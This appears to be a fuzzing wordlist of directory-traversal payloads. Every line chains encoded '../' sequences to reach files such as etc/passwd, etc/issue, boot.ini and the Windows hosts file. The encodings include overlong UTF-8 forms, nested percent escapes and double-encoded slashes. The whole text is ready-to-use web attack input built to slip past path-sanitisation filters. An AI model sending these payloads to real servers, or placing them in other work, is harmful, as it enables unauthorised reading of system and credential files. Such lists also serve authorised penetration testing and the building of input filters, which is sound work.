-%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66issue -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66issue -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66issue -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63issue -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63issue -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63issue -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63issue -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63issue -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63etc%%35%%63issue -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63%f8%80%80%80%ae%f8%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afetc%e0%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%af%f8%80%80%80%ae%f8%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cetc%25c1%259cissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259c%f8%80%80%80%ae%f8%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afetc%25c0%25afissue -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25af%f8%80%80%80%ae%f8%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%af%f8%80%80%80%ae%f8%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd 